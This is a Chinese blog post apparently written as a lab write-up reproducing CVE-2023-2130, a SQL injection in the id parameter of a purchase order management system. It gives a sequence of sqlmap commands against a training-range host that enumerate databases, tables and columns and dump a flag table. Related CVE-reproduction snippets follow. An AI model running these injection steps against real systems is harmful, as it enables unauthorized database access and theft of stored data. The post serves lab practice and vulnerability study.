CVE-2023-2130复现

最新推荐文章于 2024-07-19 12:14:36 发布
最新推荐文章于 2024-07-19 12:14:36 发布
阅读量396 收藏 6
点赞数 3
文章标签: 网络安全 web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_45956062/article/details/137109793
版权

文章目录

前言

在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。

一、复现环境

靶场:春秋云镜 CVE-2023-2130

在这里插入图片描述

二、复现步骤

根据提示,/admin/suppliers/view_details.php?id=1处存在sql注入,使用sqlmap进行注入

py sqlmap.py -u http://eci-2zeg2kupatj98zw1go74.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1 -batch -dbs

在这里插入图片描述
在这里插入图片描述发现存在注入漏洞,并且爆出数据库,继续爆表

py sqlmap.py -u http://eci-2zeg2kupatj98zw1go74.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1 -batch -D purchase_order_db -tables

在这里插入图片描述继续爆字段

py sqlmap.py -u http://eci-2zeg2kupatj98zw1go74.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1 -batch -D purchase_order_db -T users -C

在这里插入图片描述

py sqlmap.py -u http://eci-2zeg2kupatj98zw1go74.cloudeci1.ichunqiu.com/admin/suppliers/view_details.php?id=1 -batch -D purchase_order_db -tables -T fllllaaaag -C flag -dump

在这里插入图片描述
欧克,结束

迷途客卿
关注
CVE-2023-25157-main(1).zip
07-19
总而言之,CVE-2023-25157是一个涉及GeoServer的SQL注入漏洞,通过复现该漏洞,我们可以更好地理解其风险,并采取必要的措施来保护我们的系统。提供的压缩包文件包含的信息将有助于这一过程,对于学习安全防护和提升...
[春秋云镜] CVE-2023-2130
m0_73649671的博客
04-22 825
在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。
2022-2023年十大漏洞CVE编号
sunrong1027的博客
03-27 1296
2022-23经典十大漏洞CVE编号
SourceCodester v1.0 SQL 注入漏洞(CVE-2023-2130
热门推荐
Flag少侠的博客
07-19 1万+
打开靶场直接进入是需要登录的访问漏洞页面如下传送 id 参数试试使用 SQLMap 爆库_____H__[Y/n] n[Y/n] n[y/N] n[Y/n] n[Y/n] n[y/N] n------[*] mysql爆表_____H__------[7 tables]| users |爆字段_____H__------爆数据_____H__------[1 entry]| flag |
春秋云镜 CVE-2023-2130
qq274575499的博客
04-01 795
在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击。
春秋云境CVE-2023-2130
m0_64432806的博客
03-27 650
春秋云境CVE-2023-2130 在SourceCodester采购订单管理系统1.0中发现了一项被分类为关键的漏洞。受影响的是组件GET参数处理器的文件/admin/suppliers/view_details.php中的一个未知函数。对参数id的操纵导致了SQL注入。可以远程发起攻击
cve-2023-1454
04-24
漏洞描述: JeecgBoot是一款基于代码生成器的低代码开发平台。 企业Web应用程序的Java低代码平台JEECG-Boot(v3.5.0)最新未经授权的SQL注入。 影响范围: 攻击者除了可以利用 SQL 注入漏洞获取数据库中的信息...
CVE-2023-32315-Openfire-Bypass-main.zip
07-17
复现 CVE-2023-32315 的过程包括以下步骤: 1. **环境准备**:设置一个运行 Openfire 的测试环境,确保版本包含该漏洞。 2. **漏洞分析**:研究 Openfire 的源代码,定位与认证相关的函数和模块,寻找可能的绕过...
漏洞复现-CVE-2023-33246 Apache RocketMQ RCE漏洞原理与复现
关注网络安全、云原生安全
07-15 3446
服务端管理员调用的接口没有鉴权,且将内容直接拼接到执行的命令,没有做过滤。
CVE-2023-46604- RCE漏洞复现
2301_80115097的博客
11-16 3569
执行上述清理操作后过2分钟再次弹出安全告警,发现服务器再次生成configs.conf文件以及ksoftirqd/0进程,怀疑守护进程未全部清理干净,再次进行检查,发现存在多个守护进程ksoftirqd/0。虽然AMQ的61616端口依然开着,但几天未收到告警,本以为攻击者已经遗忘了我们公司,结果下午收到阿里云封禁服务器的通知,原因是服务器对外进行了DDOS攻击。由于云安全中心没有提示【拦截成功】,且该云账号的云安全中心为免费版,我们认为攻击者大概率入侵成功,必须立刻启动应急响应。
CVE-2023-23752:Joomla未授权访问漏洞复现
薛定谔嘚喵博客
09-01 1591
Joomla是一个免费的开源内容管理系统(CMS),允许用户构建网站和在线应用程序。它于 2005 年首次发布,此后成为最受欢迎的 CMS 平台之一,为全球数百万个网站提供支持。 在 Joomla! 4.0.0 到 4.2.7 中发现了一个问题。不正确地访问检查允许对 Web 服务终结点进行未经授权的访问。
漏洞复现--Confluence未授权管理用户添加 (CVE-2023-22515)
qq_53003652的博客
10-16 2033
2023年10月4日,Atlassian官方发布了对于CVE-2023-22515漏洞的补丁。这个漏洞是由属性覆盖导致,利用该漏洞攻击者可以重新执行Confluence安装流程并增加管理员账户。Atlassian Confluence是企业广泛使用的wiki系统。nuclei已上线该yaml (CVE-2023-22515)此时用户已经创建完毕,登录。
CVE-2023-21839:Weblogic反序列化漏洞复现
薛定谔嘚喵博客
04-16 4167
WebLogic是美国Oracle公司出品的一个application server,确切的说是一个基于JAVAEE架构的中间件,WebLogic是用于开发、集成、部署和管理大型分布式Web应用、网络应用和数据库应用的Java应用服务器。将Java的动态功能和Java Enterprise标准的安全性引入大型网络应用的开发、集成、部署和管理之中。
CVE漏洞复现-CVE-2023-38831 WinRAR代码执行漏洞
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
10-27 1559
WinRAR 是一款功能强大的压缩包管理器,它是档案工具RAR在 Windows环境下的图形界面。该软件可用于备份数据,缩减电子邮件附件的大小,解压缩从 Internet 上下载的RAR、ZIP及其它类型文件,并且可以新建 RAR 及 ZIP 格式等的压缩类文件。从5.60版开始,WinRAR启用了新的图标,但用户仍可以通过官网提供的主题包换回原版风格的图标。
全版本Windows RCE漏洞复现CVE-2023-36025
weixin_57514792的博客
01-10 1611
漏洞复现
i春秋,春秋云镜系列所有靶场
qq_47289634的博客
07-03 1686
该CMS的welcome.php中存在SQL注入攻击。多语言药房管理系统 (MPMS) 是用 PHP 和 MySQL 开发的, 该软件的主要目的是在药房和客户之间提供一套接口,客户是该软件的主要用户。该软件有助于为药房业务创建一个综合数据库,并根据到期、产品等各种参数提供各种报告。该CMS中php_action/editProductImage.php存在任意文件上传漏洞,进而导致任意代码执行。WSO2文件上传漏洞(CVE-2022-29464)是Orange Tsai发现的WSO2上的严重漏洞。
CVE-2023-23638复现
最新发布
09-04
CVE-2023-23638是一个未公开的漏洞编号,通常情况下,它代表一个具体的软件安全漏洞。复现CVE是指重现这个漏洞的行为,以便验证其存在、理解其影响以及评估修复措施。要复现CVE-2023-23638,一般需要满足以下几个步骤: 1. **确认漏洞细节**:首先需要获取漏洞的相关描述,包括漏洞原理、受影响的应用或库名、版本范围等。 2. **环境准备**:安装相应的软件或服务到受影响的版本,并设置成可能存在漏洞的状态。 3. **利用脚本或工具**:开发者或安全研究员会提供PoC(Proof of Concept,攻击示例),通过编写代码或利用现有工具尝试触发该漏洞。 4. **验证异常或结果**:当按照特定输入或操作执行时,观察系统是否出现预期的安全问题,如数据泄露、权限提升等。 5. **记录日志和证据**:在整个过程中,收集关键的日志信息和截图作为复现成功的证据。 由于这个漏洞目前可能还处于保密状态,公开的信息可能有限,因此复现过程依赖于官方发布的公告或第三方的研究报告。如果要进行复现,建议只在安全环境下进行,并遵守所有相关的法律和道德准则。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值